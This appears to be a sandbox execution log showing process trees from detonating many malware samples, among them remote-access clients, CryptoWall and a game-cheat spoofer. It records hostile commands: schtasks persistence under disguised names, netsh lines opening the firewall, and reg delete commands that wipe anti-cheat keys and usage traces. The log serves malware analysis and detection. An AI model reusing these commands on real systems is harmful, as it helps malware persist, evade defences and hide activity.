C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"25⤵PID:3348
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f26⤵
- Scheduled Task/Job: Scheduled Task
PID:2084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YdrSDUKWP3p3.bat" "26⤵PID:6540
-
C:\Windows\system32\chcp.comchcp 6500127⤵PID:2932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost27⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5240
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"27⤵PID:3972
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f28⤵
- Scheduled Task/Job: Scheduled Task
PID:5300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FjF88uJ10QCB.bat" "28⤵PID:1440
-
C:\Windows\system32\chcp.comchcp 6500129⤵PID:5356
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost29⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4112
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"29⤵PID:5864
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f30⤵
- Scheduled Task/Job: Scheduled Task
PID:7000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6lGU9A3I5cv9.bat" "30⤵PID:3292
-
C:\Windows\system32\chcp.comchcp 6500131⤵PID:3400
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5732
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"31⤵PID:5608
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f32⤵
- Scheduled Task/Job: Scheduled Task
PID:3632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BpT2OeBGoZL.bat" "32⤵PID:6024
-
C:\Windows\system32\chcp.comchcp 6500133⤵PID:7812
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7900
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"33⤵PID:4728
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f34⤵
- Scheduled Task/Job: Scheduled Task
PID:5648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v5SfedbaqYWn.bat" "34⤵PID:7436
-
C:\Windows\system32\chcp.comchcp 6500135⤵PID:1824
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6756
-
-
C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"C:\Users\Admin\Desktop\Mal\Files\seksiak.exe"35⤵PID:8060
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f36⤵
- Scheduled Task/Job: Scheduled Task
PID:6684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MEGrp6hHt0Du.bat" "36⤵PID:7604
-
C:\Windows\system32\chcp.comchcp 6500137⤵PID:7388
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6552
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\3.exe"C:\Users\Admin\Desktop\Mal\Files\3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 3964⤵
- Program crash
PID:5728
-
-
-
C:\Users\Admin\Desktop\Mal\Files\AsyncClient.exe"C:\Users\Admin\Desktop\Mal\Files\AsyncClient.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5596 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEA87.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:5160 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3632
-
-
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5428
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\discord.exe"C:\Users\Admin\Desktop\Mal\Files\discord.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5500 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6076
-
-
-
C:\Users\Admin\Desktop\Mal\Files\crack.exe"C:\Users\Admin\Desktop\Mal\Files\crack.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7048
-
-
C:\Users\Admin\Desktop\Mal\Files\Solara_Protect.exe"C:\Users\Admin\Desktop\Mal\Files\Solara_Protect.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"' & exit4⤵
- System Location Discovery: System Language Discovery
PID:3084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Windows" /tr '"C:\Users\Admin\AppData\Local\Temp\Windows.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6780
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1328.tmp.bat""4⤵
- System Location Discovery: System Language Discovery
PID:6424 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6460
-
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Windows.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6320
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\k360.exe"C:\Users\Admin\Desktop\Mal\Files\k360.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4740
-
-
C:\Users\Admin\Desktop\Mal\Files\Client-built.exe"C:\Users\Admin\Desktop\Mal\Files\Client-built.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6120 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6084
-
-
C:\Windows\system32\runtime.exe"C:\Windows\system32\runtime.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6656 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Runtime" /sc ONLOGON /tr "C:\Windows\system32\runtime.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4496
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\spoofer.exe"C:\Users\Admin\Desktop\Mal\Files\spoofer.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Modifies registry class
PID:1796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C://iduishopSpoofer//run.bat4⤵PID:6896
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C://iduishopSpoofer//productkey.bat4⤵PID:7012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v DigitalProductId5⤵PID:5408
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v DigitalProductId6⤵PID:6012
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C://iduishopSpoofer//OS.bat4⤵PID:3460
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgk\Security" /f5⤵PID:6488
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgk" /f5⤵PID:6728
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgc\Security" /f5⤵PID:6900
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vgc" /f5⤵PID:7084
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Uninstall\Riot Vangard" /f5⤵PID:6336
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\VALORANT-Win64-Shipping.exe" /f5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7096
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{FA99DFC7-6AC2-453A-A5E2-5E2AFF4507BD}\Count" /f5⤵PID:4652
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count" /f5⤵PID:1608
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{F2A1CB5A-E3CC-4A2E-AF9D-505A7009D442}\Count" /f5⤵PID:5844
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /f5⤵PID:6260
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{CAA59E3C-4792-41A5-9909-6A6A8D32490E}\Count" /f5⤵PID:2668
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{BCB48336-4DDD-48FF-BB0B-D3190DACB3E2}\Count" /f5⤵PID:5420
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{B267E3AD-A825-4A09-82B9-EEC22AA3B847}\Count" /f5⤵PID:5680
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{A3D53349-6E61-4557-8FC7-0028EDCEEBF6}\Count" /f5⤵PID:5416
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\UserAssist\{9E04CAB2-CC14-11DF-BB8C-A2F1DED72085}\Count" /f5⤵PID:2532
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CLASSES_ROOT\riotclient" /f5⤵PID:6648
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig" /f5⤵PID:7008
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\prueba.exe"C:\Users\Admin\Desktop\Mal\Files\prueba.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6100
-
-
C:\Users\Admin\Desktop\Mal\Files\Servers.exe"C:\Users\Admin\Desktop\Mal\Files\Servers.exe"3⤵
- Executes dropped EXE
PID:5864 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5512
-
-
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"4⤵PID:2224
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6896
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\c3.exe"C:\Users\Admin\Desktop\Mal\Files\c3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5956
-
-
C:\Users\Admin\Desktop\Mal\Files\plswork.exe"C:\Users\Admin\Desktop\Mal\Files\plswork.exe"3⤵PID:4728
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Mal\Files\plswork.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6248
-
-
C:\Windows\system32\SubDir\Client.exe"C:\Windows\system32\SubDir\Client.exe"4⤵PID:1832
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "java updater" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:6564
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\newest.exe"C:\Users\Admin\Desktop\Mal\Files\newest.exe"3⤵PID:3488
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵PID:5432
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:4920
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Modifies Windows Firewall
PID:6152
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:6808
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"5⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"6⤵PID:6248
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE7⤵
- Modifies Windows Firewall
PID:5320
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"7⤵
- Modifies Windows Firewall
PID:6336
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE7⤵
- Modifies Windows Firewall
PID:5512
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"7⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"8⤵PID:2124
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE9⤵
- Modifies Windows Firewall
PID:5220
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"9⤵
- Modifies Windows Firewall
PID:6488
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE9⤵
- Modifies Windows Firewall
PID:2192
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"9⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"10⤵PID:7388
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE11⤵
- Modifies Windows Firewall
PID:7920
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"11⤵
- Modifies Windows Firewall
PID:3696
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE11⤵
- Modifies Windows Firewall
PID:5856
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"11⤵PID:3712
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"12⤵PID:7464
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE13⤵
- Modifies Windows Firewall
PID:8124
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"13⤵
- Modifies Windows Firewall
PID:6760
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE13⤵
- Modifies Windows Firewall
PID:1080
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"13⤵PID:5812
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"14⤵PID:7540
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE15⤵
- Modifies Windows Firewall
PID:8028
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"15⤵
- Modifies Windows Firewall
PID:7220
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE15⤵
- Modifies Windows Firewall
PID:6276
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"15⤵PID:7876
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"16⤵PID:7924
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE17⤵
- Modifies Windows Firewall
PID:7216
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"17⤵
- Modifies Windows Firewall
PID:6688
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE17⤵
- Modifies Windows Firewall
PID:2308
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"17⤵PID:5248
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"18⤵PID:2688
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE19⤵
- Modifies Windows Firewall
PID:7244
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"19⤵
- Modifies Windows Firewall
PID:7532
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE19⤵
- Modifies Windows Firewall
PID:7440
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"19⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"20⤵PID:4688
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE21⤵
- Modifies Windows Firewall
PID:7684
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"21⤵
- Modifies Windows Firewall
PID:1444
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE21⤵
- Modifies Windows Firewall
PID:880
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"21⤵PID:608
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"22⤵PID:4692
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE23⤵
- Modifies Windows Firewall
PID:3632
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"23⤵
- Modifies Windows Firewall
PID:6232
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE23⤵
- Modifies Windows Firewall
PID:6812
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 132823⤵PID:2784
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\svhoste.exe"C:\Users\Admin\Desktop\Mal\Files\svhoste.exe"3⤵PID:5796
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Mal\Files\svhoste.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:5032
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"4⤵PID:6816
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4272
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\33wBG6TDZEzd.bat" "5⤵PID:1772
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:6332
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5280
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"6⤵PID:8032
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:6124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QJ6CYuGxj6vU.bat" "7⤵PID:8048
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6120
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8084
-
-
C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe"8⤵PID:5756
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svhoste.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:3684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kK9Q7aSUJVO4.bat" "9⤵PID:5856
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:1044
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4920
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\Meeting.exe"C:\Users\Admin\Desktop\Mal\Files\Meeting.exe"3⤵PID:4624
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Icon.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Icon.exe"4⤵PID:4612
-
-
-
C:\Users\Admin\Desktop\Mal\Files\CryptoWall.exe"C:\Users\Admin\Desktop\Mal\Files\CryptoWall.exe"3⤵PID:4008
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\syswow64\explorer.exe"4⤵PID:2688
-
C:\Windows\SysWOW64\svchost.exe-k netsvcs5⤵PID:6648
-
-
-
-
C:\Users\Admin\Desktop\Mal\Files\benpolatalemdar.exe"C:\Users\Admin\Desktop\Mal\Files\benpolatalemdar.exe"3⤵PID:1300
-
-
C:\Users\Admin\Desktop\Mal\Files\pfntjejghjsdkr.exe"C:\Users\Admin\Desktop\Mal\Files\pfntjejghjsdkr.exe"3⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"4⤵PID:10380
-
-
-
-
C:\Users\Admin\Desktop\Mal\New Text Document mod.exe"C:\Users\Admin\Desktop\Mal\New Text Document mod.exe"2⤵
- Downloads MZ/PE file
- Suspicious use of AdjustPrivilegeToken
PID:3504 -
C:\Users\Admin\Desktop\Mal\a\GRN.exe"C:\Users\Admin\Desktop\Mal\a\GRN.exe"3⤵
- Executes dropped EXE
PID:1500
-
-
C:\Users\Admin\Desktop\Mal\a\test.exe"C:\Users\Admin\Desktop\Mal\a\test.exe"3⤵
- Executes dropped EXE
PID:4408
-
-
C:\Users\Admin\Desktop\Mal\a\GREEN.exe"C:\Users\Admin\Desktop\Mal\a\GREEN.exe"3⤵
- Executes dropped EXE
PID:3004
-
-
C:\Users\Admin\Desktop\Mal\a\BLACKKKK.exe"C:\Users\Admin\Desktop\Mal\a\BLACKKKK.exe"3⤵
- Executes dropped EXE
PID:1340
-
-
C:\Users\Admin\Desktop\Mal\a\YLW.exe"C:\Users\Admin\Desktop\Mal\a\YLW.exe"3⤵
- Executes dropped EXE
PID:2520
-
-
